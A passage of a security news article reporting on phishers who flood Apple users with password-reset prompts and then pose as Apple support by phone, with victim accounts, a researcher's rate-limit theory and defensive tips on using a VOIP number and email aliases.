“I pick up the phone and I’m super suspicious,” Patel recalled. “So I ask them if they can verify some information about me, and after hearing some aggressive typing on his end he gives me all this information about me and it’s totally accurate.”

All of it, that is, except his real name. Patel said when he asked the fake Apple support rep to validate the name they had on file for the Apple account, the caller gave a name that was not his but rather one that Patel has only seen in background reports about him that are for sale at a people-search website called **PeopleDataLabs**.

Patel said he has worked fairly hard to remove his information from multiple people-search websites, and he found PeopleDataLabs uniquely and consistently listed this inaccurate name as an alias on his consumer profile.

“For some reason, PeopleDataLabs has three profiles that come up when you search for my info, and two of them are mine but one is an elementary school teacher from the midwest,” Patel said. “I asked them to verify my name and they said Anthony.”

Patel said the goal of the voice phishers is to trigger an Apple ID reset code to be sent to the user’s device, which is a text message that includes a one-time password. If the user supplies that one-time code, the attackers can then reset the password on the account and lock the user out. They can also then remotely wipe all of the user’s Apple devices.

**THE PHONE NUMBER IS KEY**

Chris is a cryptocurrency hedge fund owner who asked that only his first name be used so as not to paint a bigger target on himself. Chris told KrebsOnSecurity he experienced a remarkably similar phishing attempt in late February.

“The first alert I got I hit ‘Don’t Allow’, but then right after that I got like 30 more notifications in a row,” Chris said. “I figured maybe I sat on my phone weird, or was accidentally pushing some button that was causing these, and so I just denied them all.”

Chris says the attackers persisted hitting his devices with the reset notifications for several days after that, and at one point he received a call on his iPhone that said it was from Apple support.

“I said I would call them back and hung up,” Chris said, demonstrating the proper response to such unbidden solicitations. “When I called back to the real Apple, they couldn’t say whether anyone had been in a support call with me just then. They just said Apple states very clearly that it will never initiate outbound calls to customers — unless the customer requests to be contacted.”

Massively freaking out that someone was trying to hijack his digital life, Chris said he changed his passwords and then went to an Apple store and bought a new iPhone. From there, he created a new Apple iCloud account using a brand new email address.

Chris said he then proceeded to get even more system alerts on his new iPhone and iCloud account — _all the while still sitting at the local Apple Genius Bar_.

Chris told KrebsOnSecurity his Genius Bar tech was mystified about the source of the alerts, but Chris said he suspects that whatever the phishers are abusing to rapidly generate these Apple system alerts requires knowing the phone number on file for the target’s Apple account. After all, that was the _only_ aspect of Chris’s new iPhone and iCloud account that hadn’t changed.

**WATCH OUT!**

“Ken” is a security industry veteran who spoke on condition of anonymity. Ken said he first began receiving these unsolicited system alerts on his Apple devices earlier this year, but that he has not received any phony Apple support calls as others have reported.

“This recently happened to me in the middle of the night at 12:30 a.m.,” Ken said. “And even though I have my Apple watch set to remain quiet during the time I’m usually sleeping at night, it woke me up with one of these alerts. Thank god I didn’t press ‘Allow,’ which was the first option shown on my watch. I had to scroll watch the wheel to see and press the ‘Don’t Allow’ button.”

Ken shared this photo he took of an alert on his watch that woke him up at 12:30 a.m. Ken said he had to scroll on the watch face to see the “Don’t Allow” button.

Ken didn’t know it when all this was happening (and it’s not at all obvious from the Apple prompts), but clicking “Allow” would not have allowed the attackers to change Ken’s password. Rather, clicking “Allow” displays a six digit PIN that must be entered on Ken’s device — allowing Ken to change his password. It appears that these rapid password reset prompts are being used to make a subsequent inbound phone call spoofing Apple more believable.

Ken said he contacted the real Apple support and was eventually escalated to a senior Apple engineer. The engineer assured Ken that turning on an Apple Recovery Key for his account would stop the notifications once and for all.

A recovery key is an optional security feature that Apple says “helps improve the security of your Apple ID account.” It is a randomly generated 28-character code, and when you enable a recovery key it is supposed to disable Apple’s standard account recovery process. The thing is, enabling it is not a simple process, and if you ever lose that code in addition to all of your Apple devices you will be permanently locked out.

Ken said he enabled a recovery key for his account as instructed, but that it hasn’t stopped the unbidden system alerts from appearing on all of his devices every few days.

KrebsOnSecurity tested Ken’s experience, and can confirm that enabling a recovery key does nothing to stop a password reset prompt from being sent to associated Apple devices. Visiting Apple’s “forgot password” page — https://iforgot.apple.com — asks for an email address and for the visitor to solve a CAPTCHA.

After that, the page will display the last two digits of the phone number tied to the Apple account. Filling in the missing digits and hitting submit on that form will send a system alert, whether or not the user has enabled an Apple Recovery Key.

The password reset page at iforgot.apple.com.

**RATE LIMITS**

What sanely designed authentication system would send dozens of requests for a password change in the span of a few moments, when the first requests haven’t even been acted on by the user? Could this be the result of a bug in Apple’s systems?

Apple has not yet responded to requests for comment.

Throughout 2022, a criminal hacking group known as LAPSUS$ used MFA bombing to great effect in intrusions at **Cisco**, **Microsoft** and **Uber**. In response, Microsoft began enforcing “MFA number matching,” a feature that displays a series of numbers to a user attempting to log in with their credentials. These numbers must then be entered into the account owner’s Microsoft authenticator app on their mobile device to verify they are logging into the account.

**Kishan Bagaria** is a hobbyist security researcher and engineer who founded the website texts.com (now owned by Automattic), and he’s convinced Apple has a problem on its end. In August 2019, Bagaria reported to Apple a bug that allowed an exploit he dubbed “AirDoS” because it could be used to let an attacker infinitely spam all nearby iOS devices with a system-level prompt to share a file via AirDrop — a file-sharing capability built into Apple products.

Apple fixed that bug nearly four months later in December 2019, thanking Bagaria in the associated security bulletin. Bagaria said Apple’s fix was to add stricter rate limiting on AirDrop requests, and he suspects that someone has figured out a way to bypass Apple’s rate limit on how many of these password reset requests can be sent in a given timeframe.

“I think this could be a legit Apple rate limit bug that should be reported,” Bagaria said.

**WHAT CAN YOU DO?**

Apple seems requires a phone number to be on file for your account, but after you’ve set up the account it doesn’t have to be a mobile phone number. KrebsOnSecurity’s testing shows Apple will accept a VOIP number (like Google Voice). So, changing your account phone number to a VOIP number that isn’t widely known would be one mitigation here.

One caveat with the VOIP number idea: Unless you include a real mobile number, Apple’s **iMessage** and **Facetime** applications will be disabled for that device. This might a bonus for those concerned about reducing the overall attack surface of their Apple devices, since zero-click zero-days in these applications have repeatedly been used by spyware purveyors.

Also, it appears Apple’s password reset system will accept and respect email aliases. Adding a “+” character after the username portion of your email address — followed by a notation specific to the site you’re signing up at — lets you create an infinite number of unique email addresses tied to the same account.

For instance, if I were signing up at example.com, I might give my email address as krebsonsecurity+example@gmail.com. Then, I simply go back to my inbox and create a corresponding folder called “Example,” along with a new filter that sends any email addressed to that alias to the Example folder. In this case, however, perhaps a less obvious alias than “+apple” would be advisable.

**Update, March 27, 5:06 p.m. ET:** Added perspective on Ken’s experience. Also included a What Can You Do? section.

Tag

#apple